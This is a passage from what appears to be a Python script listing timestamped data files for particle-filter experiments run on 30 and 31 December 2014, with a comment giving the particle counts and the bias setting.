'data3Tue_Dec_30_23_44_32_2014.txt',
'data3Tue_Dec_30_23_44_46_2014.txt',
'data3Tue_Dec_30_23_45_01_2014.txt',
'data3Tue_Dec_30_23_45_16_2014.txt',
'data3Tue_Dec_30_23_45_31_2014.txt',
'data3Tue_Dec_30_23_45_46_2014.txt',
'data3Tue_Dec_30_23_46_00_2014.txt',
'data3Tue_Dec_30_23_46_16_2014.txt',
'data3Tue_Dec_30_23_46_31_2014.txt',
'data3Tue_Dec_30_23_46_46_2014.txt',
'data3Tue_Dec_30_23_47_01_2014.txt',
'data3Tue_Dec_30_23_47_16_2014.txt',
'data3Tue_Dec_30_23_47_31_2014.txt',
'data3Tue_Dec_30_23_47_46_2014.txt',
'data3Tue_Dec_30_23_48_01_2014.txt',
'data3Tue_Dec_30_23_48_16_2014.txt',
'data3Tue_Dec_30_23_48_31_2014.txt',
'data3Tue_Dec_30_23_48_45_2014.txt',
'data3Tue_Dec_30_23_49_00_2014.txt',
'data3Tue_Dec_30_23_49_15_2014.txt',
'data3Tue_Dec_30_23_49_30_2014.txt',
'data3Tue_Dec_30_23_49_45_2014.txt',
'data3Tue_Dec_30_23_49_59_2014.txt',
'data3Tue_Dec_30_23_50_14_2014.txt',
'data3Tue_Dec_30_23_50_29_2014.txt',
'data3Tue_Dec_30_23_50_44_2014.txt',
'data3Tue_Dec_30_23_50_59_2014.txt',
'data3Tue_Dec_30_23_51_13_2014.txt',
'data3Tue_Dec_30_23_51_28_2014.txt',
'data3Tue_Dec_30_23_51_43_2014.txt',
'data3Tue_Dec_30_23_51_57_2014.txt',
'data3Tue_Dec_30_23_52_13_2014.txt',
'data3Tue_Dec_30_23_52_28_2014.txt',
'data3Tue_Dec_30_23_52_43_2014.txt',
'data3Tue_Dec_30_23_52_58_2014.txt',
'data3Tue_Dec_30_23_53_12_2014.txt',
'data3Tue_Dec_30_23_53_27_2014.txt',
'data3Tue_Dec_30_23_53_42_2014.txt',
'data3Tue_Dec_30_23_53_56_2014.txt',
'data3Tue_Dec_30_23_54_11_2014.txt',
'data3Tue_Dec_30_23_54_26_2014.txt',
'data3Tue_Dec_30_23_54_41_2014.txt',
'data3Tue_Dec_30_23_54_56_2014.txt',
'data3Tue_Dec_30_23_55_11_2014.txt',
'data3Tue_Dec_30_23_55_26_2014.txt',
'data3Tue_Dec_30_23_55_41_2014.txt',
'data3Tue_Dec_30_23_55_55_2014.txt',
'data3Tue_Dec_30_23_56_10_2014.txt',
'data3Tue_Dec_30_23_56_25_2014.txt',
'data3Tue_Dec_30_23_56_40_2014.txt',
'data0Tue_Dec_30_23_57_21_2014.txt',
'data0Tue_Dec_30_23_57_36_2014.txt',
'data0Tue_Dec_30_23_57_51_2014.txt',
'data0Tue_Dec_30_23_58_06_2014.txt',
'data0Tue_Dec_30_23_58_20_2014.txt',
'data0Tue_Dec_30_23_58_35_2014.txt',
'data0Tue_Dec_30_23_58_50_2014.txt',
'data0Tue_Dec_30_23_59_05_2014.txt',
'data0Tue_Dec_30_23_59_20_2014.txt',
'data0Tue_Dec_30_23_59_35_2014.txt',
'data0Tue_Dec_30_23_59_49_2014.txt',
'data0Wed_Dec_31_00_00_04_2014.txt',
'data0Wed_Dec_31_00_00_18_2014.txt',
'data0Wed_Dec_31_00_00_33_2014.txt',
'data0Wed_Dec_31_00_00_48_2014.txt',
'data0Wed_Dec_31_00_01_02_2014.txt',
'data0Wed_Dec_31_00_01_17_2014.txt',
'data0Wed_Dec_31_00_01_32_2014.txt',
'data0Wed_Dec_31_00_01_48_2014.txt',
'data0Wed_Dec_31_00_02_02_2014.txt',
'data0Wed_Dec_31_00_02_18_2014.txt',
'data0Wed_Dec_31_00_02_32_2014.txt',
'data0Wed_Dec_31_00_02_47_2014.txt',
'data0Wed_Dec_31_00_03_01_2014.txt',
'data0Wed_Dec_31_00_03_17_2014.txt',
'data0Wed_Dec_31_00_03_32_2014.txt',
'data0Wed_Dec_31_00_03_46_2014.txt',
'data0Wed_Dec_31_00_04_01_2014.txt',
'data0Wed_Dec_31_00_04_16_2014.txt',
'data0Wed_Dec_31_00_04_31_2014.txt',
'data0Wed_Dec_31_00_04_46_2014.txt',
'data0Wed_Dec_31_00_05_00_2014.txt',
'data0Wed_Dec_31_00_05_15_2014.txt',
'data0Wed_Dec_31_00_05_31_2014.txt',
'data0Wed_Dec_31_00_05_46_2014.txt',
'data0Wed_Dec_31_00_06_01_2014.txt',
'data0Wed_Dec_31_00_06_15_2014.txt',
'data0Wed_Dec_31_00_06_30_2014.txt',
'data0Wed_Dec_31_00_06_45_2014.txt',
'data0Wed_Dec_31_00_07_00_2014.txt',
'data0Wed_Dec_31_00_07_14_2014.txt',
'data0Wed_Dec_31_00_07_29_2014.txt',
'data0Wed_Dec_31_00_07_44_2014.txt',
'data0Wed_Dec_31_00_07_59_2014.txt',
'data0Wed_Dec_31_00_08_13_2014.txt',
'data0Wed_Dec_31_00_08_28_2014.txt',
'data0Wed_Dec_31_00_08_43_2014.txt',
'data0Wed_Dec_31_00_08_57_2014.txt',
'data0Wed_Dec_31_00_09_12_2014.txt',
'data0Wed_Dec_31_00_09_27_2014.txt',
'data1Wed_Dec_31_00_09_42_2014.txt',
'data1Wed_Dec_31_00_09_57_2014.txt',
'data1Wed_Dec_31_00_10_11_2014.txt',
'data1Wed_Dec_31_00_10_26_2014.txt',
'data1Wed_Dec_31_00_10_41_2014.txt',
'data1Wed_Dec_31_00_10_56_2014.txt',
'data1Wed_Dec_31_00_11_11_2014.txt',
'data1Wed_Dec_31_00_11_26_2014.txt',
'data1Wed_Dec_31_00_11_40_2014.txt',
'data1Wed_Dec_31_00_11_55_2014.txt',
'data1Wed_Dec_31_00_12_10_2014.txt',
'data1Wed_Dec_31_00_12_25_2014.txt',
'data1Wed_Dec_31_00_12_40_2014.txt',
'data1Wed_Dec_31_00_12_54_2014.txt',
'data1Wed_Dec_31_00_13_09_2014.txt',
'data1Wed_Dec_31_00_13_24_2014.txt',
'data1Wed_Dec_31_00_13_39_2014.txt',
'data1Wed_Dec_31_00_13_54_2014.txt',
'data1Wed_Dec_31_00_14_09_2014.txt',
'data1Wed_Dec_31_00_14_24_2014.txt',
'data1Wed_Dec_31_00_14_38_2014.txt',
'data1Wed_Dec_31_00_14_53_2014.txt',
'data1Wed_Dec_31_00_15_07_2014.txt',
'data1Wed_Dec_31_00_15_22_2014.txt',
'data1Wed_Dec_31_00_15_37_2014.txt',
'data1Wed_Dec_31_00_15_52_2014.txt',
'data1Wed_Dec_31_00_16_06_2014.txt',
'data1Wed_Dec_31_00_16_22_2014.txt',
'data1Wed_Dec_31_00_16_38_2014.txt',
'data1Wed_Dec_31_00_16_52_2014.txt',
'data1Wed_Dec_31_00_17_07_2014.txt',
'data1Wed_Dec_31_00_17_22_2014.txt',
'data1Wed_Dec_31_00_17_37_2014.txt',
'data1Wed_Dec_31_00_17_51_2014.txt',
'data1Wed_Dec_31_00_18_06_2014.txt',
'data1Wed_Dec_31_00_18_20_2014.txt',
'data1Wed_Dec_31_00_18_35_2014.txt',
'data1Wed_Dec_31_00_18_50_2014.txt',
'data1Wed_Dec_31_00_19_04_2014.txt',
'data1Wed_Dec_31_00_19_19_2014.txt',
'data1Wed_Dec_31_00_19_34_2014.txt',
'data1Wed_Dec_31_00_19_48_2014.txt',
'data1Wed_Dec_31_00_20_03_2014.txt',
'data1Wed_Dec_31_00_20_18_2014.txt',
'data1Wed_Dec_31_00_20_33_2014.txt',
'data1Wed_Dec_31_00_20_48_2014.txt',
'data1Wed_Dec_31_00_21_03_2014.txt',
'data1Wed_Dec_31_00_21_18_2014.txt',
'data1Wed_Dec_31_00_21_32_2014.txt',
'data1Wed_Dec_31_00_21_47_2014.txt',
'data2Wed_Dec_31_00_22_02_2014.txt',
'data2Wed_Dec_31_00_22_17_2014.txt',
'data2Wed_Dec_31_00_22_32_2014.txt',
'data2Wed_Dec_31_00_22_47_2014.txt',
'data2Wed_Dec_31_00_23_01_2014.txt',
'data2Wed_Dec_31_00_23_16_2014.txt',
'data2Wed_Dec_31_00_23_31_2014.txt',
'data2Wed_Dec_31_00_23_46_2014.txt',
'data2Wed_Dec_31_00_24_01_2014.txt',
'data2Wed_Dec_31_00_24_16_2014.txt',
'data2Wed_Dec_31_00_24_30_2014.txt',
'data2Wed_Dec_31_00_24_45_2014.txt',
'data2Wed_Dec_31_00_25_00_2014.txt',
'data2Wed_Dec_31_00_25_15_2014.txt',
'data2Wed_Dec_31_00_25_29_2014.txt',
'data2Wed_Dec_31_00_25_44_2014.txt',
'data2Wed_Dec_31_00_25_59_2014.txt',
'data2Wed_Dec_31_00_26_14_2014.txt',
'data2Wed_Dec_31_00_26_29_2014.txt',
'data2Wed_Dec_31_00_26_43_2014.txt',
'data2Wed_Dec_31_00_26_59_2014.txt',
'data2Wed_Dec_31_00_27_13_2014.txt',
'data2Wed_Dec_31_00_27_28_2014.txt',
'data2Wed_Dec_31_00_27_43_2014.txt',
'data2Wed_Dec_31_00_27_58_2014.txt',
'data2Wed_Dec_31_00_28_13_2014.txt',
'data2Wed_Dec_31_00_28_28_2014.txt',
'data2Wed_Dec_31_00_28_43_2014.txt',
'data2Wed_Dec_31_00_28_57_2014.txt',
'data2Wed_Dec_31_00_29_12_2014.txt',
'data2Wed_Dec_31_00_29_27_2014.txt',
'data2Wed_Dec_31_00_29_42_2014.txt',
'data2Wed_Dec_31_00_29_57_2014.txt',
'data2Wed_Dec_31_00_30_12_2014.txt',
'data2Wed_Dec_31_00_30_27_2014.txt',
'data2Wed_Dec_31_00_30_42_2014.txt',
'data2Wed_Dec_31_00_30_57_2014.txt',
'data2Wed_Dec_31_00_31_12_2014.txt',
'data2Wed_Dec_31_00_31_27_2014.txt',
'data2Wed_Dec_31_00_31_41_2014.txt',
'data2Wed_Dec_31_00_31_56_2014.txt',
'data2Wed_Dec_31_00_32_11_2014.txt',
'data2Wed_Dec_31_00_32_26_2014.txt',
'data2Wed_Dec_31_00_32_40_2014.txt',
'data2Wed_Dec_31_00_32_55_2014.txt',
'data2Wed_Dec_31_00_33_10_2014.txt',
'data2Wed_Dec_31_00_33_24_2014.txt',
'data2Wed_Dec_31_00_33_39_2014.txt',
'data2Wed_Dec_31_00_33_54_2014.txt',
'data2Wed_Dec_31_00_34_09_2014.txt',
'data3Wed_Dec_31_00_34_24_2014.txt',
'data3Wed_Dec_31_00_34_39_2014.txt',
'data3Wed_Dec_31_00_34_54_2014.txt',
'data3Wed_Dec_31_00_35_09_2014.txt',
'data3Wed_Dec_31_00_35_24_2014.txt',
'data3Wed_Dec_31_00_35_39_2014.txt',
'data3Wed_Dec_31_00_35_54_2014.txt',
'data3Wed_Dec_31_00_36_08_2014.txt',
'data3Wed_Dec_31_00_36_23_2014.txt',
'data3Wed_Dec_31_00_36_38_2014.txt',
'data3Wed_Dec_31_00_36_53_2014.txt',
'data3Wed_Dec_31_00_37_08_2014.txt',
'data3Wed_Dec_31_00_37_22_2014.txt',
'data3Wed_Dec_31_00_37_38_2014.txt',
'data3Wed_Dec_31_00_37_53_2014.txt',
'data3Wed_Dec_31_00_38_08_2014.txt',
'data3Wed_Dec_31_00_38_22_2014.txt',
'data3Wed_Dec_31_00_38_37_2014.txt',
'data3Wed_Dec_31_00_38_52_2014.txt',
'data3Wed_Dec_31_00_39_07_2014.txt',
'data3Wed_Dec_31_00_39_22_2014.txt',
'data3Wed_Dec_31_00_39_36_2014.txt',
'data3Wed_Dec_31_00_39_51_2014.txt',
'data3Wed_Dec_31_00_40_06_2014.txt',
'data3Wed_Dec_31_00_40_21_2014.txt',
'data3Wed_Dec_31_00_40_36_2014.txt',
'data3Wed_Dec_31_00_40_50_2014.txt',
'data3Wed_Dec_31_00_41_05_2014.txt',
'data3Wed_Dec_31_00_41_20_2014.txt',
'data3Wed_Dec_31_00_41_34_2014.txt',
'data3Wed_Dec_31_00_41_50_2014.txt',
'data3Wed_Dec_31_00_42_04_2014.txt',
'data3Wed_Dec_31_00_42_19_2014.txt',
'data3Wed_Dec_31_00_42_33_2014.txt',
'data3Wed_Dec_31_00_42_48_2014.txt',
'data3Wed_Dec_31_00_43_03_2014.txt',
'data3Wed_Dec_31_00_43_18_2014.txt',
'data3Wed_Dec_31_00_43_33_2014.txt',
'data3Wed_Dec_31_00_43_48_2014.txt',
'data3Wed_Dec_31_00_44_03_2014.txt',
'data3Wed_Dec_31_00_44_18_2014.txt',
'data3Wed_Dec_31_00_44_33_2014.txt',
'data3Wed_Dec_31_00_44_48_2014.txt',
'data3Wed_Dec_31_00_45_03_2014.txt',
'data3Wed_Dec_31_00_45_18_2014.txt',
'data3Wed_Dec_31_00_45_33_2014.txt',
'data3Wed_Dec_31_00_45_48_2014.txt',
'data3Wed_Dec_31_00_46_03_2014.txt',
'data3Wed_Dec_31_00_46_18_2014.txt', 'data3Wed_Dec_31_00_46_32_2014.txt']
# ---------------------------------------------------------------------------
# this is for the 12/30/2014 experiments
# varied over 1, 10, 25, 50, 100 repeat particles per particle
# 10000 particles total per filter
# bias is at 0.8 in both the "real" world (realWorld.cpp) and, presumably,
# the filter model — TODO confirm the second setting against the run config
files = ['data0Tue_Dec_30_20_37_34_2014.txt',
'data0Tue_Dec_30_20_37_49_2014.txt',
'data0Tue_Dec_30_20_38_04_2014.txt',
'data0Tue_Dec_30_20_38_19_2014.txt',
'data0Tue_Dec_30_20_38_34_2014.txt',
'data0Tue_Dec_30_20_38_49_2014.txt',
'data0Tue_Dec_30_20_39_04_2014.txt',
'data0Tue_Dec_30_20_39_19_2014.txt',
'data0Tue_Dec_30_20_39_34_2014.txt',
'data0Tue_Dec_30_20_39_49_2014.txt',
'data0Tue_Dec_30_20_40_04_2014.txt',
'data0Tue_Dec_30_20_40_19_2014.txt',
'data0Tue_Dec_30_20_40_34_2014.txt',
'data0Tue_Dec_30_20_40_49_2014.txt',
'data0Tue_Dec_30_20_41_04_2014.txt',
'data0Tue_Dec_30_20_41_18_2014.txt',
'data0Tue_Dec_30_20_41_34_2014.txt',
'data0Tue_Dec_30_20_41_49_2014.txt',
'data0Tue_Dec_30_20_42_04_2014.txt',
'data0Tue_Dec_30_20_42_19_2014.txt',
'data0Tue_Dec_30_20_42_34_2014.txt',
'data0Tue_Dec_30_20_42_49_2014.txt',
'data0Tue_Dec_30_20_43_04_2014.txt',
'data0Tue_Dec_30_20_43_19_2014.txt',
'data0Tue_Dec_30_20_43_34_2014.txt',
'data0Tue_Dec_30_20_43_49_2014.txt',
'data0Tue_Dec_30_20_44_04_2014.txt',
'data0Tue_Dec_30_20_44_19_2014.txt',
'data0Tue_Dec_30_20_44_34_2014.txt',
'data0Tue_Dec_30_20_44_49_2014.txt',
'data0Tue_Dec_30_20_45_04_2014.txt',
'data0Tue_Dec_30_20_45_19_2014.txt',
'data0Tue_Dec_30_20_45_34_2014.txt',
'data0Tue_Dec_30_20_45_49_2014.txt',
'data0Tue_Dec_30_20_46_04_2014.txt',
'data0Tue_Dec_30_20_46_19_2014.txt',
'data0Tue_Dec_30_20_46_34_2014.txt',
'data0Tue_Dec_30_20_46_49_2014.txt',
'data0Tue_Dec_30_20_47_04_2014.txt',
'data0Tue_Dec_30_20_47_19_2014.txt',
'data0Tue_Dec_30_20_47_34_2014.txt',
'data0Tue_Dec_30_20_47_50_2014.txt',
'data0Tue_Dec_30_20_48_05_2014.txt',
'data0Tue_Dec_30_20_48_20_2014.txt',
'data0Tue_Dec_30_20_48_35_2014.txt',
'data0Tue_Dec_30_20_48_50_2014.txt',
'data0Tue_Dec_30_20_49_05_2014.txt',
'data0Tue_Dec_30_20_49_20_2014.txt',
'data0Tue_Dec_30_20_49_35_2014.txt',
'data0Tue_Dec_30_20_49_50_2014.txt',
'data1Tue_Dec_30_20_50_05_2014.txt',
'data1Tue_Dec_30_20_50_20_2014.txt',
'data1Tue_Dec_30_20_50_35_2014.txt',
'data1Tue_Dec_30_20_50_50_2014.txt',
'data1Tue_Dec_30_20_51_05_2014.txt',
'data1Tue_Dec_30_20_51_20_2014.txt',
'data1Tue_Dec_30_20_51_35_2014.txt',
'data1Tue_Dec_30_20_51_50_2014.txt',
'data1Tue_Dec_30_20_52_05_2014.txt',
'data1Tue_Dec_30_20_52_20_2014.txt',
'data1Tue_Dec_30_20_52_35_2014.txt',
'data1Tue_Dec_30_20_52_50_2014.txt',
'data1Tue_Dec_30_20_53_05_2014.txt',
'data1Tue_Dec_30_20_53_20_2014.txt',
'data1Tue_Dec_30_20_53_35_2014.txt',
'data1Tue_Dec_30_20_53_50_2014.txt',
'data1Tue_Dec_30_20_54_04_2014.txt',
'data1Tue_Dec_30_20_54_19_2014.txt',
'data1Tue_Dec_30_20_54_34_2014.txt',
'data1Tue_Dec_30_20_54_49_2014.txt',
'data1Tue_Dec_30_20_55_04_2014.txt',
'data1Tue_Dec_30_20_55_19_2014.txt',
'data1Tue_Dec_30_20_55_34_2014.txt',
'data1Tue_Dec_30_20_55_49_2014.txt',
'data1Tue_Dec_30_20_56_04_2014.txt',
'data1Tue_Dec_30_20_56_19_2014.txt',
'data1Tue_Dec_30_20_56_34_2014.txt',
'data1Tue_Dec_30_20_56_49_2014.txt',
'data1Tue_Dec_30_20_57_04_2014.txt',
'data1Tue_Dec_30_20_57_19_2014.txt',
'data1Tue_Dec_30_20_57_33_2014.txt',
'data1Tue_Dec_30_20_57_48_2014.txt',
'data1Tue_Dec_30_20_58_03_2014.txt',
'data1Tue_Dec_30_20_58_18_2014.txt',
'data1Tue_Dec_30_20_58_33_2014.txt',
'data1Tue_Dec_30_20_58_48_2014.txt',
'data1Tue_Dec_30_20_59_03_2014.txt',
'data1Tue_Dec_30_20_59_18_2014.txt',
'data1Tue_Dec_30_20_59_33_2014.txt',
'data1Tue_Dec_30_20_59_48_2014.txt',
'data1Tue_Dec_30_21_00_03_2014.txt',
'data1Tue_Dec_30_21_00_17_2014.txt',
'data1Tue_Dec_30_21_00_32_2014.txt',
'data1Tue_Dec_30_21_00_47_2014.txt',
'data1Tue_Dec_30_21_01_02_2014.txt',
'data1Tue_Dec_30_21_01_17_2014.txt',
'data1Tue_Dec_30_21_01_32_2014.txt',
'data1Tue_Dec_30_21_01_47_2014.txt',
'data1Tue_Dec_30_21_02_03_2014.txt',
'data1Tue_Dec_30_21_02_17_2014.txt',
'data2Tue_Dec_30_21_02_32_2014.txt',
'data2Tue_Dec_30_21_02_47_2014.txt',
'data2Tue_Dec_30_21_03_02_2014.txt',
'data2Tue_Dec_30_21_03_17_2014.txt',
'data2Tue_Dec_30_21_03_32_2014.txt',
'data2Tue_Dec_30_21_03_47_2014.txt',
'data2Tue_Dec_30_21_04_02_2014.txt',
'data2Tue_Dec_30_21_04_17_2014.txt',
'data2Tue_Dec_30_21_04_31_2014.txt',
'data2Tue_Dec_30_21_04_46_2014.txt',
'data2Tue_Dec_30_21_05_01_2014.txt',
'data2Tue_Dec_30_21_05_16_2014.txt',
'data2Tue_Dec_30_21_05_31_2014.txt',
'data2Tue_Dec_30_21_05_45_2014.txt',
'data2Tue_Dec_30_21_06_00_2014.txt',
'data2Tue_Dec_30_21_06_16_2014.txt',
'data2Tue_Dec_30_21_06_31_2014.txt',
'data2Tue_Dec_30_21_06_46_2014.txt',
'data2Tue_Dec_30_21_07_01_2014.txt',
'data2Tue_Dec_30_21_07_16_2014.txt',
'data2Tue_Dec_30_21_07_31_2014.txt',
'data2Tue_Dec_30_21_07_46_2014.txt',
'data2Tue_Dec_30_21_08_01_2014.txt',
'data2Tue_Dec_30_21_08_16_2014.txt',
'data2Tue_Dec_30_21_08_30_2014.txt',
'data2Tue_Dec_30_21_08_45_2014.txt',
'data2Tue_Dec_30_21_09_01_2014.txt',
'data2Tue_Dec_30_21_09_16_2014.txt',
'data2Tue_Dec_30_21_09_31_2014.txt',
'data2Tue_Dec_30_21_09_46_2014.txt',
'data2Tue_Dec_30_21_10_00_2014.txt',
'data2Tue_Dec_30_21_10_16_2014.txt',
'data2Tue_Dec_30_21_10_31_2014.txt',
'data2Tue_Dec_30_21_10_45_2014.txt',
'data2Tue_Dec_30_21_11_00_2014.txt',
'data2Tue_Dec_30_21_11_16_2014.txt',
'data2Tue_Dec_30_21_11_31_2014.txt',
'data2Tue_Dec_30_21_11_45_2014.txt',
'data2Tue_Dec_30_21_12_01_2014.txt',
'data2Tue_Dec_30_21_12_16_2014.txt',
'data2Tue_Dec_30_21_12_31_2014.txt',
'data2Tue_Dec_30_21_12_46_2014.txt',
'data2Tue_Dec_30_21_13_00_2014.txt',
'data2Tue_Dec_30_21_13_15_2014.txt',
'data2Tue_Dec_30_21_13_31_2014.txt',
'data2Tue_Dec_30_21_13_46_2014.txt',
'data2Tue_Dec_30_21_14_00_2014.txt',
'data2Tue_Dec_30_21_14_15_2014.txt',
'data2Tue_Dec_30_21_14_30_2014.txt',
'data2Tue_Dec_30_21_14_45_2014.txt',
'data3Tue_Dec_30_21_15_00_2014.txt',
'data3Tue_Dec_30_21_15_15_2014.txt',
'data3Tue_Dec_30_21_15_29_2014.txt',
'data3Tue_Dec_30_21_15_44_2014.txt',
'data3Tue_Dec_30_21_15_59_2014.txt',
'data3Tue_Dec_30_21_16_15_2014.txt',
'data3Tue_Dec_30_21_16_30_2014.txt',
'data3Tue_Dec_30_21_16_44_2014.txt',
'data3Tue_Dec_30_21_16_59_2014.txt',
'data3Tue_Dec_30_21_17_15_2014.txt',
'data3Tue_Dec_30_21_17_29_2014.txt',
'data3Tue_Dec_30_21_17_45_2014.txt',
'data3Tue_Dec_30_21_18_00_2014.txt',
'data3Tue_Dec_30_21_18_15_2014.txt',
'data3Tue_Dec_30_21_18_29_2014.txt',
'data3Tue_Dec_30_21_18_44_2014.txt',
'data3Tue_Dec_30_21_18_59_2014.txt',
'data3Tue_Dec_30_21_19_14_2014.txt',
'data3Tue_Dec_30_21_19_29_2014.txt',
'data3Tue_Dec_30_21_19_44_2014.txt',
'data3Tue_Dec_30_21_19_59_2014.txt',
'data3Tue_Dec_30_21_20_14_2014.txt',
'data3Tue_Dec_30_21_20_29_2014.txt',
'data3Tue_Dec_30_21_20_45_2014.txt',
'data3Tue_Dec_30_21_21_00_2014.txt',
'data3Tue_Dec_30_21_21_15_2014.txt',
'data3Tue_Dec_30_21_21_30_2014.txt',
'data3Tue_Dec_30_21_21_45_2014.txt',
'data3Tue_Dec_30_21_21_59_2014.txt',
'data3Tue_Dec_30_21_22_14_2014.txt',
'data3Tue_Dec_30_21_22_29_2014.txt',
'data3Tue_Dec_30_21_22_44_2014.txt',
'data3Tue_Dec_30_21_22_58_2014.txt',
'data3Tue_Dec_30_21_23_14_2014.txt',
'data3Tue_Dec_30_21_23_28_2014.txt',
'data3Tue_Dec_30_21_23_43_2014.txt',
'data3Tue_Dec_30_21_23_58_2014.txt',
'data3Tue_Dec_30_21_24_13_2014.txt',
'data3Tue_Dec_30_21_24_28_2014.txt',
'data3Tue_Dec_30_21_24_43_2014.txt',
'data3Tue_Dec_30_21_24_58_2014.txt',
'data3Tue_Dec_30_21_25_12_2014.txt',
'data3Tue_Dec_30_21_25_28_2014.txt',
'data3Tue_Dec_30_21_25_43_2014.txt',
'data3Tue_Dec_30_21_25_58_2014.txt',
'data3Tue_Dec_30_21_26_12_2014.txt',
'data3Tue_Dec_30_21_26_27_2014.txt',
'data3Tue_Dec_30_21_26_42_2014.txt',
'data3Tue_Dec_30_21_26_57_2014.txt',
'data3Tue_Dec_30_21_27_12_2014.txt',
'data0Tue_Dec_30_21_27_52_2014.txt',
'data0Tue_Dec_30_21_28_07_2014.txt',
'data0Tue_Dec_30_21_28_22_2014.txt',
'data0Tue_Dec_30_21_28_37_2014.txt',
'data0Tue_Dec_30_21_28_51_2014.txt',
'data0Tue_Dec_30_21_29_06_2014.txt',
'data0Tue_Dec_30_21_29_21_2014.txt',
'data0Tue_Dec_30_21_29_36_2014.txt',
'data0Tue_Dec_30_21_29_51_2014.txt',
'data0Tue_Dec_30_21_30_06_2014.txt',
'data0Tue_Dec_30_21_30_21_2014.txt',
'data0Tue_Dec_30_21_30_36_2014.txt',
'data0Tue_Dec_30_21_30_50_2014.txt',
'data0Tue_Dec_30_21_31_06_2014.txt',
'data0Tue_Dec_30_21_31_21_2014.txt',
'data0Tue_Dec_30_21_31_36_2014.txt',
'data0Tue_Dec_30_21_31_51_2014.txt',
'data0Tue_Dec_30_21_32_06_2014.txt',
'data0Tue_Dec_30_21_32_21_2014.txt',
'data0Tue_Dec_30_21_32_36_2014.txt',
'data0Tue_Dec_30_21_32_51_2014.txt',
'data0Tue_Dec_30_21_33_05_2014.txt',
'data0Tue_Dec_30_21_33_20_2014.txt',
'data0Tue_Dec_30_21_33_35_2014.txt',
'data0Tue_Dec_30_21_33_50_2014.txt',
'data0Tue_Dec_30_21_34_05_2014.txt',
'data0Tue_Dec_30_21_34_20_2014.txt',
'data0Tue_Dec_30_21_34_34_2014.txt',
'data0Tue_Dec_30_21_34_49_2014.txt',
'data0Tue_Dec_30_21_35_04_2014.txt',
'data0Tue_Dec_30_21_35_20_2014.txt',
'data0Tue_Dec_30_21_35_35_2014.txt',
'data0Tue_Dec_30_21_35_49_2014.txt',
'data0Tue_Dec_30_21_36_04_2014.txt',
'data0Tue_Dec_30_21_36_19_2014.txt',
'data0Tue_Dec_30_21_36_34_2014.txt',
'data0Tue_Dec_30_21_36_49_2014.txt',
'data0Tue_Dec_30_21_37_04_2014.txt',
'data0Tue_Dec_30_21_37_19_2014.txt',
'data0Tue_Dec_30_21_37_34_2014.txt',
'data0Tue_Dec_30_21_37_49_2014.txt',
'data0Tue_Dec_30_21_38_04_2014.txt',
'data0Tue_Dec_30_21_38_18_2014.txt',
'data0Tue_Dec_30_21_38_33_2014.txt',
'data0Tue_Dec_30_21_38_48_2014.txt',
'data0Tue_Dec_30_21_39_03_2014.txt',
'data0Tue_Dec_30_21_39_18_2014.txt',
'data0Tue_Dec_30_21_39_33_2014.txt',
'data0Tue_Dec_30_21_39_48_2014.txt',
'data0Tue_Dec_30_21_40_02_2014.txt',
'data1Tue_Dec_30_21_40_18_2014.txt',
'data1Tue_Dec_30_21_40_33_2014.txt',
'data1Tue_Dec_30_21_40_48_2014.txt',
'data1Tue_Dec_30_21_41_02_2014.txt',
'data1Tue_Dec_30_21_41_17_2014.txt',
'data1Tue_Dec_30_21_41_31_2014.txt',
'data1Tue_Dec_30_21_41_46_2014.txt',
'data1Tue_Dec_30_21_42_01_2014.txt',
'data1Tue_Dec_30_21_42_16_2014.txt',
'data1Tue_Dec_30_21_42_31_2014.txt',
'data1Tue_Dec_30_21_42_46_2014.txt',
'data1Tue_Dec_30_21_43_01_2014.txt',
'data1Tue_Dec_30_21_43_16_2014.txt',
'data1Tue_Dec_30_21_43_31_2014.txt',
'data1Tue_Dec_30_21_43_46_2014.txt',
'data1Tue_Dec_30_21_44_01_2014.txt',
'data1Tue_Dec_30_21_44_15_2014.txt',
'data1Tue_Dec_30_21_44_30_2014.txt',
'data1Tue_Dec_30_21_44_46_2014.txt',
'data1Tue_Dec_30_21_45_01_2014.txt',
'data1Tue_Dec_30_21_45_15_2014.txt',
'data1Tue_Dec_30_21_45_30_2014.txt',
'data1Tue_Dec_30_21_45_45_2014.txt',
'data1Tue_Dec_30_21_46_00_2014.txt',
'data1Tue_Dec_30_21_46_15_2014.txt',
'data1Tue_Dec_30_21_46_29_2014.txt',
'data1Tue_Dec_30_21_46_44_2014.txt',
'data1Tue_Dec_30_21_46_59_2014.txt',
'data1Tue_Dec_30_21_47_14_2014.txt',
'data1Tue_Dec_30_21_47_29_2014.txt',
'data1Tue_Dec_30_21_47_44_2014.txt',
'data1Tue_Dec_30_21_47_59_2014.txt',
'data1Tue_Dec_30_21_48_13_2014.txt',
'data1Tue_Dec_30_21_48_28_2014.txt',
'data1Tue_Dec_30_21_48_43_2014.txt',
'data1Tue_Dec_30_21_48_58_2014.txt',
'data1Tue_Dec_30_21_49_13_2014.txt',
'data1Tue_Dec_30_21_49_28_2014.txt',
'data1Tue_Dec_30_21_49_43_2014.txt',
'data1Tue_Dec_30_21_49_57_2014.txt',
'data1Tue_Dec_30_21_50_13_2014.txt',
'data1Tue_Dec_30_21_50_27_2014.txt',
'data1Tue_Dec_30_21_50_42_2014.txt',
'data1Tue_Dec_30_21_50_57_2014.txt',
'data1Tue_Dec_30_21_51_12_2014.txt',
'data1Tue_Dec_30_21_51_27_2014.txt',
'data1Tue_Dec_30_21_51_42_2014.txt',
'data1Tue_Dec_30_21_51_56_2014.txt',
'data1Tue_Dec_30_21_52_11_2014.txt',
'data1Tue_Dec_30_21_52_26_2014.txt',
'data2Tue_Dec_30_21_52_40_2014.txt',
'data2Tue_Dec_30_21_52_55_2014.txt',
'data2Tue_Dec_30_21_53_10_2014.txt',
'data2Tue_Dec_30_21_53_25_2014.txt',
'data2Tue_Dec_30_21_53_40_2014.txt',
'data2Tue_Dec_30_21_53_54_2014.txt',
'data2Tue_Dec_30_21_54_09_2014.txt',
'data2Tue_Dec_30_21_54_24_2014.txt',
'data2Tue_Dec_30_21_54_39_2014.txt',
'data2Tue_Dec_30_21_54_53_2014.txt',
'data2Tue_Dec_30_21_55_08_2014.txt',
'data2Tue_Dec_30_21_55_23_2014.txt',
'data2Tue_Dec_30_21_55_38_2014.txt',
'data2Tue_Dec_30_21_55_53_2014.txt',
'data2Tue_Dec_30_21_56_08_2014.txt',
'data2Tue_Dec_30_21_56_23_2014.txt',
'data2Tue_Dec_30_21_56_37_2014.txt',
'data2Tue_Dec_30_21_56_52_2014.txt',
'data2Tue_Dec_30_21_57_07_2014.txt',
'data2Tue_Dec_30_21_57_22_2014.txt',
'data2Tue_Dec_30_21_57_37_2014.txt',
